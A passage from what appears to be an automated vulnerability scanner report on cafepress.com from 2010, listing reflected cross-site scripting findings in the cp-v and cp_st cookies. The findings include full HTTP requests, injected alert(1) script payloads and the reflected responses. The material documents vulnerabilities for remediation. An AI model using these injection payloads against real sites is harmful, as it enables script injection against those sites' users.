cp-v=D0026F27AADDAF9A26C54608326FC1BAe64e3"-alert(1)-"4f4360aac81 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 59646 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe64e3"-alert(1)-"4f4360aac81 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.23. http://www.cafepress.com/+buttons [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+buttons
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49536</script><script>alert(1)</script>00786d92ac was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=49536</script><script>alert(1)</script>00786d92ac ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 59667 Date: Sun, 26 Dec 2010 13:48:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:52 GMT; path=/ Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:52 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59667 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '49536</script><script>alert(1)</script>00786d92ac ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.24. http://www.cafepress.com/+calendars [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+calendars
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f773c"-alert(1)-"fa99a9758e1 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+calendars HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAf773c"-alert(1)-"fa99a9758e1 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 57747 Date: Sun, 26 Dec 2010 13:49:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57747 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf773c"-alert(1)-"fa99a9758e1 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.25. http://www.cafepress.com/+calendars [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+calendars
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 673c2</script><script>alert(1)</script>81eee94446c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+calendars HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=673c2</script><script>alert(1)</script>81eee94446c ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 57764 Date: Sun, 26 Dec 2010 13:49:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:13 GMT; path=/ Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:13 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57764 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '673c2</script><script>alert(1)</script>81eee94446c ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.26. http://www.cafepress.com/+clocks [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+clocks
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 405f7"-alert(1)-"c5d27bb0659 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+clocks HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA405f7"-alert(1)-"c5d27bb0659 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59340 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59340 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA405f7"-alert(1)-"c5d27bb0659 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.27. http://www.cafepress.com/+clocks [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+clocks
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56c87</script><script>alert(1)</script>eb1ed059733 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+clocks HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=56c87</script><script>alert(1)</script>eb1ed059733 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 59367 Date: Sun, 26 Dec 2010 13:48:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59367 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '56c87</script><script>alert(1)</script>eb1ed059733 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.28. http://www.cafepress.com/+coasters [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+coasters
Issue detail
